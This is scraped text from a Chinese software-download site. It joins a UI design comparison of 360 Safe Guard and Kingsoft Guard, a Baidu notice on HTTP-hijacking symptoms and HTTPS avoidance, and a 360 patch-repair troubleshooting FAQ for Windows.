data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441421789.jpg"/></strong><br/><strong>全局導航導航項只有四項,局部導航也很簡單,雖然沒有360那樣分類詳細,可是簡單大方,便于操作。</strong></p><p><strong>對比360軟件管家和金山軟件管家的導航設計可以看出,前者更注重分類的詳細程度,導航項的精準以及覆蓋范圍的廣度,后者則更注重簡潔大方以及交互的可操作性。到底是哪個正確,這就得看用戶到底更希望哪種需求以及不同產品之間的差異化(比如說360的軟件數量要多于金山,可能就造就了它更需要分類詳細)了。</strong></p><p><br/><strong> &nbsp; &nbsp; &nbsp; </strong><strong>二</strong><strong>,交互設計中行為召喚的運用。</strong> &nbsp;行為召喚是一種用戶引導的方法,所謂行為召喚,實際上就是呈現界面的時候,考慮到用戶的心理,激發起用戶的參與度。我姑且把行為召喚的方法細分為:用戶情感召喚,顏色召喚,圖形召喚等,下面就兩款產品在行為召喚上的運用做詳細分析。<br/><strong><br/></strong> &nbsp; &nbsp;360安全衛士中行為召喚的運用:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441444223.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;741&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;449&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;741&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/bfeec81c176bfe4a3ede2114900204b6_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441444223.jpg" data-rawwidth="741" data-rawheight="449" class="origin_image zh-lightbox-thumb lazy" width="741" data-original="https://pic3.zhimg.com/bfeec81c176bfe4a3ede2114900204b6_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441444223.jpg"/><br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441431538.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;677&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;214&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;677&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/1c1450240679017be4b5ed3fab84b784_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441431538.jpg" data-rawwidth="677" data-rawheight="214" class="origin_image zh-lightbox-thumb lazy" width="677" data-original="https://pic1.zhimg.com/1c1450240679017be4b5ed3fab84b784_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441431538.jpg"/><br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441461049.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;596&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;376&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;596&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/53d3954d6e417984093e02b0f9eab665_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;以上可以看出,360的產品在設計時很多地方運用到了行為召喚的方法,很過時候是同時用到</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441461049.jpg" data-rawwidth="596" data-rawheight="376" class="origin_image zh-lightbox-thumb lazy" width="596" data-original="https://pic2.zhimg.com/53d3954d6e417984093e02b0f9eab665_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441461049.jpg"/></p><p>以上可以看出,360的產品在設計時很多地方運用到了行為召喚的方法,很過時候是同時用到<strong>用戶情感召喚,顏色召喚,圖形召喚</strong>的幾種,起到了很好的效果。</p><p><strong>相對來講,金山衛士中行為召喚的運用沒有360那么突出,但也有亮點。</strong><br/>查殺木馬的時候有三種方式,快速掃描,全盤掃描和自定義掃描,金山衛士和360安全衛士都是推薦使用快速方式,但<strong>方式不同</strong>,如下圖<strong>:</strong></p><p>360安全衛士:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441496168.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;570&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;201&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;570&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/7c71dd129f25c4157565c4bfe3837178_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441496168.jpg" data-rawwidth="570" data-rawheight="201" class="origin_image zh-lightbox-thumb lazy" width="570" data-original="https://pic1.zhimg.com/7c71dd129f25c4157565c4bfe3837178_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441496168.jpg"/><br/>金山衛士:<br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441411776.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;478&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;255&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;478&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/78d6a0d74172b767cfe77b47c65b6bec_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441411776.jpg" data-rawwidth="478" data-rawheight="255" class="origin_image zh-lightbox-thumb lazy" width="478" data-original="https://pic1.zhimg.com/78d6a0d74172b767cfe77b47c65b6bec_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441411776.jpg"/><br/></p><p><strong>360</strong><strong>安全衛士的三種方式平行排列,然后在快速掃描上加推薦二字,而金山衛士則是用更大的圖形,文字,加粗的邊框和字體以及占據視覺熱區(一個界面的中間和上方都屬于熱區)來表達”推薦“二字的意思,比文字來的更加直觀,表現更有力度。(運用了圖形召喚,顏色召喚等)</strong><br/><strong><br/></strong><br/><strong> &nbsp; &nbsp; &nbsp; &nbsp;三</strong><strong>,復選框的運用。 &nbsp; </strong>在交互設計中,有時候有效地利用復選框能夠提供良好的用戶體驗。</p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong><strong>1 清理插件中復選框的運用</strong></p><p>360安全衛士中:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441483483.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;848&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;209&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;848&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic4.zhimg.com/980626c92fdbae15b7d73cb98c37261b_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山衛士中:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441483483.jpg" data-rawwidth="848" data-rawheight="209" class="origin_image zh-lightbox-thumb lazy" width="848" data-original="https://pic4.zhimg.com/980626c92fdbae15b7d73cb98c37261b_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441483483.jpg"/>金山衛士中:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441476406.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;836&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;836&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/83f4102078ad8e99ad5632ca0ae73e48_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441476406.jpg" data-rawwidth="836" data-rawheight="279" class="origin_image zh-lightbox-thumb lazy" width="836" data-original="https://pic1.zhimg.com/83f4102078ad8e99ad5632ca0ae73e48_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441476406.jpg"/><br/></p><p><strong>以上可以看出,360產品的建議清理的復選框是選中的,這樣用戶不需要什么操作只要點擊立即清理就能基本完成他們清理插件的任務,減少用戶操作流程,降低用戶操作門檻,提供了良好的用戶體驗,而金山這點做的相對較差。</strong></p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </strong><strong>2,</strong><strong>垃圾清理時復選框的運用</strong></p><p>360安全衛士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441482015.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;418&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;159&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;418&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山衛士中的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441482015.jpg" data-rawwidth="418" data-rawheight="159" class="content_image lazy" width="418" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441482015.jpg"/>金山衛士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441451036.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;471&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;185&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;471&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/f0b73c83f180496fbf6493f3bb4b29d6_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441451036.jpg" data-rawwidth="471" data-rawheight="185" class="origin_image zh-lightbox-thumb lazy" width="471" data-original="https://pic3.zhimg.com/f0b73c83f180496fbf6493f3bb4b29d6_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441451036.jpg"/><br/></p><p>在進行具體垃圾清理的時候(非一鍵清理),會有一些類別,比如所上網產生的垃圾,媒體播放產生的垃圾等,這時候如果我想清除windows系統的所有垃圾,那么我只需要<strong>將”windows系統垃圾文件“這個復選框選上就ok,沒必要一個一個就行勾選,這樣就會減少用戶的交互過程,降低用戶操作難度</strong>。<strong>由上圖可以看出,360在類別前提供復選框,做得非常好,而金山則沒有,相對體驗較差。</strong></p><p><br/><br/></p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp;四</strong><strong>,一些其他的細節問題</strong></p><p><strong> &nbsp;1,開機加速中的類別問題 &nbsp; &nbsp; &nbsp;</strong><strong> &nbsp; &nbsp;</strong></p><p>360安全衛士的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441462253.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;835&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;294&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;835&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic4.zhimg.com/7b47d612be95f24baa94518075b44af3_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山衛士中的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441462253.jpg" data-rawwidth="835" data-rawheight="294" class="origin_image zh-lightbox-thumb lazy" width="835" data-original="https://pic4.zhimg.com/7b47d612be95f24baa94518075b44af3_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441462253.jpg"/>金山衛士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441521112.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;838&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;293&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;838&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/ed09676dc9ff605fa8f9b639f150cdba_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441521112.jpg" data-rawwidth="838" data-rawheight="293" class="origin_image zh-lightbox-thumb lazy" width="838" data-original="https://pic3.zhimg.com/ed09676dc9ff605fa8f9b639f150cdba_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441521112.jpg"/><br/></p><p>可以看出,在開機加速的軟件中中,360安全衛士只是沒規則的羅列,而金山則是按照類別進行分類的。那么這有什么好處呢?舉個例子,比如我設置開機啟動項時,我只希望開一些系統的軟件,然后開一個聊天工具,其他的影音播放什么的軟件通通關掉。那么這時候分類的作用就大了,讓用戶通過類別能進行快速的操作,這一點金山做的要好,360相對較差。</p><p><strong>金山的分類機制能夠引導用戶進行快速操作,如果在類別前加上復選框對類別直接操作就更方便了,相對于金山,360的無頭緒羅列會讓人感到很混亂。</strong></p><p><br/></p><p><strong>2,功能大全里“全部頁面的”元素呈現方式</strong></p><p>360安全衛士:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441532329.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;849&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;371&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;849&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/b9b925084cdde4bb90797cf75d9aa645_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山衛士的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441532329.jpg" data-rawwidth="849" data-rawheight="371" class="origin_image zh-lightbox-thumb lazy" width="849" data-original="https://pic2.zhimg.com/b9b925084cdde4bb90797cf75d9aa645_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441532329.jpg"/>金山衛士的:<br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441591350.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;837&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;386&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;837&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/797d6dce55112a794e01066a538cf37e_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441591350.jpg" data-rawwidth="837" data-rawheight="386" class="origin_image zh-lightbox-thumb lazy" width="837" data-original="https://pic3.zhimg.com/797d6dce55112a794e01066a538cf37e_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441591350.jpg"/><br/></p><p><strong>360安全衛士的元素呈現方式是在頁面右側加滾動條來實現的,而金山衛士則是通過頁面的左右切換來實現的,個人更認同360安全衛士的,因為一般來講交互中要盡量的減少視覺變換。、</strong><br/> </p><p><br/></p><p><strong>總結:本文在一些交互細節方面的設計對360安全衛士和金山衛士兩個產品進行了比較性分析。兩個產品在設計中各有優劣,很多方面運用了一些很好的交互設計技巧??傮w來講,360安全衛士在交互設計的各個方面能更好地去引導用戶,給用戶帶來良好的用戶體驗,但也有不足之處;相比之下,金山衛士在設計中有很多不足,但也有亮點。本文本著產品人對產品的態度進行分析,如能幫助兩個產品在用戶體驗方面有所改進,欣喜不已。</strong></p><p><strong><br/></strong></p><p><br/></p> [網絡安全]百度安全檢測提示您的網絡環境極有可能性已被劫持是什么回事 怎么解決 http://www.pirinnaturalssoapandspa.com//html/118015_1.html 西西 網絡安全 2016/11/25 14:09:39 <p>近日很多網民用戶用百度搜索的時候出現了‘您的網絡環境極有可能性已被劫持’這種現象,無論是用的谷歌瀏覽器還是IE瀏覽器還是360瀏覽器都出現了這種情況,那么到底是怎么回事呢,會不會是電腦中毒了?讓很多網友很是不安,想知道最正確的答案,下面西西為大家講解一下!</p><p><img src="https://pic.cr173.com/up/2016-11/2016112514174035887.png"/></p><h3>劫持問題說明:</h3><p><span style="color: rgb(255, 0, 0);"><strong>一、什么是http劫持?</strong></span></p><p>通常您使用http訪問百度的過程中,由于沒有采用https安全訪問模式,訪問中可能會被運營劫持到您的請求信息并加以篡改,例如:竊取您的隱私(劫持方會竊取您的電話信息、搜索結果等,)、設置彈窗廣告、篡改您的http訪問信息(訪問地址會帶有tn小尾巴)、以及偽裝百度結果頁,極大的影響您正常訪問百度服務。</p><p><strong><span style="color: rgb(112, 48, 160);">常見的具體表現,但不僅限于情形:</span></strong></p><p>1)搜索結果頁的鏈接中,“異?!闭宫F了tn數字后綴。例如在百度首頁進行搜索時,展現的結果頁地址鏈接為:<a href="http://www.baidu.com/s?&wd=hao123&tn=92078526_hao_pg(正常情況下應該是http://www.baidu.com/s?&wd=hao123)" _src="http://www.baidu.com/s?&wd=hao123&tn=92078526_hao_pg(正常情況下應該是http://www.baidu.com/s?&wd=hao123)">http://www.baidu.com/s?&amp;wd=hao123&amp;tn=92078526_hao_pg(正常情況下應該是http://www.baidu.com/s?&amp;wd=hao123)</a></p><p>2)進行搜索時,無論搜索的搜索詞是什么,搜索結果頁都會展現【{WD}】、【${arg_wd}】的搜索結果。例如這個搜索結果;</p><p>3)搜索結果頁面無限自動重復刷新,看不到搜索內容;</p><p>4)輸入帶有空格的搜索詞后,搜索結果頁上的關鍵詞中,“空格”變成了“+”號。例如這個搜索結果;</p><p>5)搜索結果頁展示亂碼,例如這個搜索結果;</p><p>6)輸入搜索詞點擊搜索后,自動搜索之前搜索過的搜索詞結果,或其他不相關的搜索詞結果;</p><p>7)輸入搜索詞點擊搜索后,網頁顯示報錯信息“網頁定向重復”;</p><p>8)輸入搜索詞點擊搜索后,自動跳回百度首頁;</p><p>9)輸入搜索詞點擊搜索后,自動跳轉到搜狗搜索頁面,或其他搜索引擎的結果;</p><p>10)地址欄輸入<a href="http://www.baidu.com/" _src="http://www.baidu.com/">http://www.baidu.com/</a><span style="line-height: 1em;">但是打開的頁面卻是類似<a href="http://www.baidu.com/?tn=SE_hldp00512_huttpmkq" _src="http://www.baidu.com/?tn=SE_hldp00512_huttpmkq">http://www.baidu.com/?tn=SE_hldp00512_huttpmkq</a></span><span style="line-height: 1em;">的結果。</span></p><p><span style="color: rgb(255, 0, 0);"><strong>二、如何避免被劫持?</strong></span></p><p>1.建議您嘗試加密連接https://www.baidu.com進行搜索,看看問題是否依然存在?需要注意的是,如果您的IE瀏覽器是8.0以下版本或使用了其他瀏覽器的兼容模式(如360瀏覽器的兼容模式),是無法通過https加密鏈接使用百度服務的。我們強烈建議您升級ie瀏覽器至8.0以上版本或切換到其他瀏覽器的極速模式。</p><p>2.如果您使用了高版本瀏覽器非兼容模式,建議你直接通過<a href="https://www.baidu.com" _src="https://www.baidu.com">https://www.baidu.com</a><span style="line-height: 1em;">訪問百度。同時我們建議您將上述頁面設置為瀏覽器首頁,根據我們的測試,這可以有效解決絕大部分的網絡劫持問題,設置方法:<a href="https://www.baidu.com/cache/sethelp/help.html。" _src="https://www.baidu.com/cache/sethelp/help.html。">https://www.baidu.com/cache/sethelp/help.html。</a></span></p><p>3.請查看一下百度網頁搜索的地址中,是否有tn=xxxx一串數字的后綴。如果有,煩您請發給我們,我們的工程師團隊會進行詳盡的分析和跟進。搜索結果顯示異常反饋頁面地址:<a href="http://f3.baidu.com/index.php/feedback/tools/fb" _src="http://f3.baidu.com/index.php/feedback/tools/fb">http://f3.baidu.com/index.php/feedback/tools/fb</a></p><p>三、如果問題依舊無法避免,你可以嘗試到網信辦投訴頁面下進行投訴:</p><p><a href="http://www.chinatcc.gov.cn:8080/cms/shensus/" _src="http://www.chinatcc.gov.cn:8080/cms/shensus/">http://www.chinatcc.gov.cn:8080/cms/shensus/</a></p> [安全產品]360安全衛士常見漏洞修復問題有哪些 最新360漏洞修復常見問題整理 http://www.pirinnaturalssoapandspa.com//html/109790_1.html 西西 安全產品 2016/10/8 14:10:30 <p><span style="line-height: 0px;"></span>不少小伙伴在進行360安全衛士的時候,會出現各種問題,其中最為主要的就是漏洞修復問題,不知道該怎么辦,因此小編在這里給大家講講。</p><p align="center"><img src="https://pic.cr173.com/up/2016-10/14759072172853361.png" title="截圖14.png"/></p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p><strong>漏洞修復常見問題整理介紹</strong></p><p>1.補丁安裝失敗</p><p>(1)鼠標右鍵單擊桌面的360圖標→選擇“屬性”→在快捷方式選項下點擊“打開文件位置”→雙擊打開hotfix文件夾→找到對應的補丁安裝包后,雙擊進行安裝,如有彈出報錯,則發送安裝失敗的具體報錯的截圖或文字。</p><p>(2)360安裝目錄下hotfix文件夾里,雙擊對應下載的補丁提示:不是有效的win32應用程序。</p><p>打開360漏洞修復界面,點擊右上角的“設置”,然后點擊補丁保存設置里的“打開目錄”,找到對應的補丁安裝包,雙擊進行安裝</p><p>a.下載補丁時數據不完整或損壞導致。</p><p>b.建議手動使用迅雷等下載工具下載安裝:點擊360掃描的漏洞后,360右側顯示的詳細信息里,有此補丁的下載鏈接。</p><p>2.下載失敗</p><p>(1)下載補丁時數據不完整,建議重新下載</p><p>(2)同一時段補丁下載請求過大,導致微軟的服務器壓力大,建議更換時段再重新下載。</p><p>(3)可能防火墻和殺毒軟件的設置影響到下載,建議重新修改防火墻和殺毒軟件的相關設置,后再下載此補丁</p><p>(4)使用代理服務器連接微軟或本地服務器相當的不穩定,建議盡量不要使用代理服務器后,再進行漏洞補丁下載。</p><p>(5)您可以選中一個補丁,在右側顯示的詳細信息里,有此補丁的下載鏈接,建議手動點擊官方下載,使用下載工具下載到本地后手動安裝。</p><p>另:鼠標右鍵單擊桌面的360圖標,選擇屬性,點擊“查找目標位置”后,找到360leakfixer.leakrepair.som.log文件,以及下載log,然后上傳。(一般補丁日時采用此方法,來查看下載日志,以便分析原因)。</p><p>3.反復掃描出補丁</p><p>(1)請檢查用戶是否安裝了還原類軟件,如PC保鮮盒、雨過天晴等;如果有安裝,請設置在打補丁之后再創建還原點</p><p>(2)嘗試手動安裝此補丁,是否會出現任何報錯提示:在360安裝目錄下的的hotfix文件夾里, 雙擊對應下載的補丁</p><p>(3)可以先關閉衛士的自我保護,把leakrepaid.dat文件刪除-&gt;忽略補丁-&gt;關閉衛士-&gt;再體檢(不要修復完漏洞就體檢,容易造成反復)</p><p>(4)查看補丁掃描條件,看是否是某個組件限制或其他原因,文件升不上來</p><p>(5)打開360主界面:修復漏洞----查看并修復漏洞---勾選不能修復的漏洞名稱----忽略選中漏洞</p><p>4.使用360安全衛士掃描漏洞時,提示:數據文件丟失,無法進行掃描,并且360界面右側官方日志無法顯示</p><p>(1)在“開始”——“運行”中輸入“regsvr32 &nbsp;msxml3.dll”,重新注冊一下xml文件即可。</p><p>(2)如重新注冊xml方法不能正常,請關閉您正在使用的防火墻后再進行注冊。</p><p>(3)關閉防火墻之后再安裝360安全衛士,重新檢測。</p><p>5.安裝補丁提示:此補丁系統找不到指定的路徑。</p><p>(1)設置文件屬性:打開系統盤,左上方的工具選項----文件夾選項----查看----把“隱藏受保護的操作系統文件(推薦)”的勾去掉----選擇顯示所有文件和文件夾。</p><p>(2)將WINDOWS下$hf_mig$(隱藏文件夾)這個文件夾刪除。</p><p>(3)重啟電腦后,繼續使用360安裝補丁。</p><p>6.不能訪問Windows Installer服務.可能是您在安全模式下運行Windows或Windows Installer沒有正確的安裝</p><p>(1)點擊桌面開始——運行——輸入services.msc——找到windows installer——右鍵——屬性——啟動類型設為自動</p><p>(2)曾安裝過ACDSee5.0(包括迷你中文版),卸載它。如果還不行就重裝Windows Installer 或者ACDSee 4.0</p><p>(3)控制面板你—添加刪除程序--再次安裝windows installer2.0,運行instmsiw.exe如果說\服務已經安裝\然后直接退出安裝就再跟著做,否則你重裝就OK了</p><p>(4)刪除注冊表中的</p><p>[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\MSIServer]</p><p>然后運行instmsiw.exe</p><p>7.安裝程序遇到了一個錯誤: &nbsp;您沒有許可來更新 Windows XP</p><p>(1)以系統管理員身份登錄,在CMD下運行命令:</p><p>secedit /configure /cfg%windir%\\repair\\secsetup.inf /db secsetup.sdb /verbose</p><p>(2)然后在輸入:gpupdate 來刷新組策略。</p><p>(3)如果沒有即時生效,重啟下電腦。</p><p>8. 藍屏問題</p><p>可以將c:\\windows\\minidump文件夾壓縮上傳,以便我們進一步分析藍屏的原因。</p><p>具體操作如下:請打開鼠標右鍵“我的電腦”-屬性-高級-啟動和故障恢復,按下圖進行設置,再次藍屏后即會在c:\\windows\\下出現minidump文件,請將minidump文件壓縮后發送,</p><p>9. 